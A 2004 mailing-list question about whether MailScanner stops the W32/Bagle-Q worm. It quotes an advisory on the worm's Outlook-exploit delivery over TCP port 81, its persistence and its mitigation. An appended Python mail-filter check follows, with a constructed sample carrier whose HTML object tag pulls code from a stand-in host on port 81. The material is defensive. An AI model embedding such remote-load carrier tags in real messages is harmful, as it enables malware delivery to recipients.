Will MailScanner pickup the W32/Bagle-Q virus?

Plant, Dean dean.plant at ROKE.CO.UK
Thu Mar 18 10:32:48 GMT 2004


As this virus does not have an attachment, can someone confirm if it will be stopped by MailScanner?

Thanks

Dean.

W32/Bagle-Q is a mass-mailing virus. This virus spreads in an unusual manner, so please read the information below carefully.

W32/Bagle-Q spreads via a "carrier" email which does not contain the worm as an attachment.

When you open a "carrier" email, the email attempts to exploit a vulnerability in Outlook which automatically downloads W32/Bagle-Q from the PC which sent you the "carrier" email. The security vulnerability was reportedly patched by Microsoft in Microsoft Security Bulletin MS03-040.

The "carrier" email downloads and launches a Visual Basic script. This script downloads W32/Bagle-Q via an HTTP (web) request to TCP port 81 on the sender's PC.

The downloaded copy of W32/Bagle-Q is placed into your system folder with the name directs.exe.

W32/Bagle-Q loads on your PC and terminates a wide range of security applications.

A registry entry is added to the key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run so that the program directs.exe loads every time you logon to your computer.

W32/Bagle-Q makes multiple copies of itself into folders which are likely to be part of a file-sharing network.

W32/Bagle-Q infects programs on your PC by appending itself to existing EXE files (this is called "parasitic virus infection").

The danger of W32/Bagle-Q can be mitigated not only by updating Sophos Anti-Virus but by blocking connections to TCP port 81 through your network firewall. (This port is unlikely to be required for any real services.)

Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking port 81 inbound means that even if you do get infected you will not pass the virus on to others.

You should also apply the latest Internet Explorer/Outlook Express patches from Microsoft. The vulnerability used by W32/Bagle-Q is described in the Microsoft Security Bulletin MS03-040 and is referred to as the "Object Tag vulnerability in Popup Window".

--

Visit our website at www.roke.co.uk

Registered Office: Roke Manor Research Ltd, Siemens House, Oldbury, Bracknell,
Berkshire. RG12 8FZ

The information contained in this e-mail and any attachments is confidential to
Roke Manor Research Ltd and must not be passed to any third party without
permission. This communication is for information only and shall not create or
change any contractual relationship.



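An added example, not code from the original post or from MailScanner, of the kind of body check the question is really about: a message with no attachment can still carry a reference that pulls the worm from TCP port 81, so a mail filter has to inspect the HTML parts, not just attachments. The tag/attribute list, the 192.0.2.10 address and the sample carrier message are constructed assumptions, not a captured W32/Bagle-Q sample.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

WORM_PORT = 81  # the advisory above: the carrier fetches the worm over HTTP on TCP/81
# Tags whose URL attributes can pull remote content into a rendered message (assumed list).
URL_ATTRS = {"object": ("data", "codebase"), "iframe": ("src",),
             "embed": ("src",), "script": ("src",)}

class RemoteRefParser(HTMLParser):
    """Collect (tag, url) pairs for tags that load remote content."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):  # HTMLParser lower-cases tag and attribute names
        wanted = URL_ATTRS.get(tag)
        if wanted:
            for name, value in attrs:
                if name in wanted and value:
                    self.refs.append((tag, value))

def scan_message(raw):
    """Return (level, tag, url) for every remote reference in the HTML parts of a raw
    RFC 822 message; level is "block" when the URL targets TCP/81, else "review"."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        parser = RemoteRefParser()
        parser.feed(part.get_content())
        for tag, url in parser.refs:
            try:
                port = urlsplit(url).port
            except ValueError:  # malformed port in the URL: keep it for review
                port = None
            findings.append(("block" if port == WORM_PORT else "review", tag, url))
    return findings

# Constructed sample carrier, not a captured Bagle-Q message (192.0.2.0/24 is documentation space).
CARRIER = b"""From: sender@example.net
To: user@example.com
Subject: hi
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body>Hello<object data="http://192.0.2.10:81/x.php"></object></body></html>
"""
```

A "review" finding only means the message loads remote content; the port 81 match is what ties a finding to the behaviour described in the advisory, and blocking that port at the firewall (as the advisory recommends) covers messages this check misses.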